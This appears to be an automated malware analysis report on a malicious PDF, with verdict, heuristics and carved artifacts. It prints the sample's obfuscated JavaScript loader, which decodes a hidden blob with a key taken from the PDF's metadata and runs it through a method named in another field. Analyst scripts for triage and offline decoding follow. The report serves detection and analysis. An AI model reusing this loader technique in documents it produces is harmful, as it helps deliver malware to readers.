Verdict: MALICIOUS
Risk Score: 134
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell (analyzer mapping). Note that the only scripting surface visible in this report is JavaScript embedded in the PDF and run by the reader, which corresponds to T1059.007 (JavaScript); no PowerShell content appears in the carved artifact or the matched lines below.
The ML classifier strongly indicates this PDF is malicious. Embedded JavaScript, flagged by the PDF_JAVASCRIPT and PDF_JS heuristics, is present and obfuscated, and the ML_NYX_PDF_MALICIOUS signal agrees. The script extracted as javascript_obj0008_000.js base64-decodes an embedded blob, strips a repeating key taken from the document's /Producer metadata, and then invokes a document method whose name is read from the /Author field on the result. This is second-stage staging: the decoded content is not shown in this report, so whether that stage downloads, drops or directly exploits is inferred rather than observed. The verdict rests on the construction itself, which has no benign use in a form.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics (4)
- JavaScript action [PDF_JAVASCRIPT, low, 2 related findings]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster [PDF_JS_EXPLOIT_CLUSTER, critical]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script:
  <</Type/Action/S/JavaScript/JS(\nfunction OOH2cYK\(TYHd\){var df='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',D7t='',G20,x3,aKHIqn,rUqlz,IStcZE,tQ4KnF,T8sK;for\(var oINMVmj=0;oINMVmj<TYHd.length;\){G20=df.indexOf\(TYHd.charAt\(oINMVmj++\)\);x3=df.indexOf\(TYHd.charAt\(oINMVmj++\)\);aKHIqn=df.indexOf\(TYHd.charAt\(oINMVmj++\)\);rUqlz=df.indexOf\(TYHd.charAt\(oINMVmj++\)\);IStcZE=\(G20<<2\)+\(x3>>4\);tQ4KnF=\(\(x3&15\)<<4\)+\(aKHIqn>>2\);T8sK=\(\(aKHIqn&3\)<<6\)+rUqlz;D7t+=S …
- Embedded JS stream [PDF_JS, low]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact [EXTRACTED_FILE_STATIC_TRIAGE, medium]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| javascript_obj0008_000.js | pdf-javascript-stream | PDF /JS object 8 at offset 0x230 | 5547 bytes | 20d0121a38c0f12df004819b9ac6e34ab890fb4d0d9b0081b27cecfcded6c542 |

Detection
- ClamAV: No threats found (a signature miss; it does not weigh against the heuristic and ML findings above).
- Obfuscation or payload: likely. Carved artifact contains 4 eval/decoder/string-building token(s). 51 of 74 identifiers look randomly generated (e.g. 'Z2J36pp8a2pWx6aeeH1ZpoWtmmldqWiGu5xbrXdi'), consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
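The three static checks the obfuscation finding describes (decoder or string-building tokens, randomly generated identifier names, long base64-like blobs) can be reproduced against any carved script. The block below is an added example, not the analyzer's own triage code: the token list, the "looks random" rule, the 80-character blob threshold and the list of known builtin names are assumptions chosen for this example, and the script it scans is a constructed stand-in for the carved artifact that reuses the sample's identifier names with a shortened body and a dummy blob.

```javascript
// Added example, not the analyzer's code: a small static triage pass of the kind
// the EXTRACTED_FILE_STATIC_TRIAGE finding describes. Token list, identifier rule,
// blob threshold and known-name list are assumptions made for this example.

// Tokens that suggest a decoder or runtime string assembly (assumed list).
const DECODER_TOKENS = ["eval", "unescape", "fromCharCode", "charCodeAt", "atob", "Function"];

// JavaScript syntax and common Acrobat/DOM names that must never be counted as
// mangled identifiers (assumed list; extend for the APIs the sample uses).
const KNOWN = new Set(["function", "var", "let", "const", "return", "this", "if", "for",
  "while", "new", "String", "length", "indexOf", "charAt", "charCodeAt", "fromCharCode",
  "producer", "author", "app", "alert", "eval", "unescape", "atob", "Function"]);

// An identifier "looks random" if it mixes digits and letters, has a run of two or
// more capitals inside a mixed-case name, has no vowel at all, or runs four or more
// consonants together. ALL_CAPS constants are ordinary and never flagged.
function looksRandom(name) {
  if (/^[A-Z0-9_$]+$/.test(name)) return false;
  if (/\d/.test(name) && /[A-Za-z]/.test(name)) return true;
  if (/[A-Z]{2}/.test(name.slice(1)) && /[a-z]/.test(name)) return true;
  if (name.length >= 3 && !/[aeiou]/i.test(name)) return true;
  return /[^aeiou\W\d_]{4}/i.test(name);   // four consecutive consonant letters
}

// Scan a script and return the three counts plus a combined verdict.
function triageScript(src) {
  // Blank out string literals first so blob contents do not pollute the identifier set.
  const code = src.replace(/'[^']*'|"[^"]*"/g, "''");
  const tokens = DECODER_TOKENS.filter(t => new RegExp("\\b" + t + "\\b").test(code));
  const idents = [...new Set(code.match(/[A-Za-z_$][A-Za-z0-9_$]*/g) || [])]
    .filter(n => !KNOWN.has(n));
  const random = idents.filter(looksRandom);
  // Blob check runs on the raw source; 80+ base64-alphabet characters counts as a blob.
  const blobs = src.match(/[A-Za-z0-9+\/]{80,}={0,2}/g) || [];
  return {
    decoderTokens: tokens,
    identifiers: idents.length,
    randomLooking: random,
    base64Blobs: blobs.length,
    suspicious: tokens.length >= 2 && random.length / Math.max(idents.length, 1) > 0.5,
  };
}

// Constructed stand-in for the carved script: the sample's identifier names, a
// shortened body, and a dummy 100-character blob (not the real payload).
const SAMPLE = [
  "function OOH2cYK(TYHd){var df='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',D7t='';",
  "D7t+=String.fromCharCode(df.indexOf(TYHd.charAt(0)));return D7t;}",
  "function geAvvPwm(R7h,gfH9Z3cY){return String.fromCharCode(R7h.charCodeAt(0)-gfH9Z3cY.charCodeAt(0));}",
  "vw0=geAvvPwm(OOH2cYK('" + "QUJD".repeat(25) + "='),this.producer);",
  "JmKb=this.author;uZxlnx=this[JmKb];uZxlnx(vw0);",
].join("\n");

console.log(triageScript(SAMPLE));
```

On the constructed stand-in this reports two decoder tokens (fromCharCode, charCodeAt), nine of ten user-named identifiers as random-looking, and one blob; the 64-character base64 alphabet the decoder carries is deliberately below the blob threshold so that the decoder table is not double-counted as a payload.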
Preview script
First 1,000 lines of the extracted script:
function OOH2cYK(TYHd){var df='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',D7t='',G20,x3,aKHIqn,rUqlz,IStcZE,tQ4KnF,T8sK;for(var oINMVmj=0;oINMVmj<TYHd.length;){G20=df.indexOf(TYHd.charAt(oINMVmj++));x3=df.indexOf(TYHd.charAt(oINMVmj++));aKHIqn=df.indexOf(TYHd.charAt(oINMVmj++));rUqlz=df.indexOf(TYHd.charAt(oINMVmj++));IStcZE=(G20<<2)+(x3>>4);tQ4KnF=((x3&15)<<4)+(aKHIqn>>2);T8sK=((aKHIqn&3)<<6)+rUqlz;D7t+=String.fromCharCode(IStcZE);if(aKHIqn!=64)D7t+=String.fromCharCode(tQ4KnF);if(rUqlz!=64)D7t+=String.fromCharCode(T8sK);}
return D7t;}
function geAvvPwm(R7h,gfH9Z3cY){var FI3bk='',m0T=0;for(fKvvt=0;fKvvt<R7h.length;fKvvt++){FI3bk+=String.fromCharCode(R7h.charCodeAt(fKvvt)-gfH9Z3cY.charCodeAt(m0T++));if(m0T>=gfH9Z3cY.length)m0T=0;}
return FI3bk;}
vw0=geAvvPwm(OOH2cYK('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'),this.producer);JmKb=this.author;uZxlnx=this[JmKb];uZxlnx(vw0);
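To recover the payload without opening the PDF in a reader, the following added example (not the analyzer's code and not the sample's own code) re-implements the script's two decoding stages, OOH2cYK (base64) and geAvvPwm (repeating-key subtraction), and resolves the sink named by /Author without calling it. The blob is not reproduced in this report, so the blob, /Producer and /Author values below are constructed fixtures; the real values must be read from the sample's Info dictionary (for example with pdfinfo or exiftool) and the real blob taken from the carved .js.

```javascript
// Added example, not code from the report or the sample: re-implementation of the
// carved script's decoding pipeline so an analyst can recover the payload offline.
//   stage 1  OOH2cYK : base64 text -> byte string
//   stage 2  geAvvPwm: subtract a repeating key (the PDF's /Producer string)
//   sink             : this[this.author](payload), a Doc method chosen by /Author
// Blob, /Producer and /Author below are constructed fixtures, not the sample's values.

// Stage 1: same effect as the sample's hand-rolled base64 decoder (OOH2cYK).
function stage1Base64(b64) {
  return Buffer.from(b64, "base64").toString("latin1");
}

// Stage 2: mirrors geAvvPwm exactly. Each character has the matching key character
// subtracted, cycling through the key. There is no modulo: a negative result goes
// through String.fromCharCode's 16-bit wrap, just as it would inside Acrobat, so a
// wrong key yields code units above 0xFF rather than an error.
function stage2Unkey(data, key) {
  let out = "";
  for (let i = 0, k = 0; i < data.length; i++) {
    out += String.fromCharCode(data.charCodeAt(i) - key.charCodeAt(k));
    if (++k >= key.length) k = 0;
  }
  return out;
}

// The line the sample runs: vw0 = geAvvPwm(OOH2cYK(blob), this.producer).
function decodePayload(blob, producer) {
  return stage2Unkey(stage1Base64(blob), producer);
}

// Inverse of the two stages, used only to build a round-trip fixture. The sample's
// decoder cannot wrap, so whoever built the real blob had to keep every
// plaintext+key sum below 256; the check here enforces the same constraint.
function encodePayload(plain, producer) {
  let keyed = "";
  for (let i = 0, k = 0; i < plain.length; i++) {
    const v = plain.charCodeAt(i) + producer.charCodeAt(k);
    if (v > 255) throw new Error("plaintext+key exceeds one byte at index " + i);
    keyed += String.fromCharCode(v);
    if (++k >= producer.length) k = 0;
  }
  return Buffer.from(keyed, "latin1").toString("base64");
}

// The sample's last statement calls no fixed API: it reads a method name from
// /Author and runs this[name](payload). Resolve the sink without executing it.
function describeSink(docInfo, payload) {
  return { sink: "this." + docInfo.author + "(...)", argument: payload };
}

// Constructed fixture (assumed values, not the sample's metadata or payload).
const FIXTURE_PRODUCER = "Acrobat PDFMaker";
const FIXTURE_AUTHOR = "eval";
const FIXTURE_PLAIN = "app.alert('decoded');";
const FIXTURE_BLOB = encodePayload(FIXTURE_PLAIN, FIXTURE_PRODUCER);

// Stand-alone run: decode the fixture and show where the result would be sent.
function demo() {
  const payload = decodePayload(FIXTURE_BLOB, FIXTURE_PRODUCER);
  return { blob: FIXTURE_BLOB, payload, sink: describeSink({ author: FIXTURE_AUTHOR }, payload).sink };
}
console.log(demo());
```

Because the key is the exact /Producer string and the sink is the exact /Author string, the carved .js on its own is not enough to finish the analysis: both metadata values have to be taken from the same PDF, and a trailing space or version suffix in /Producer changes every decoded byte.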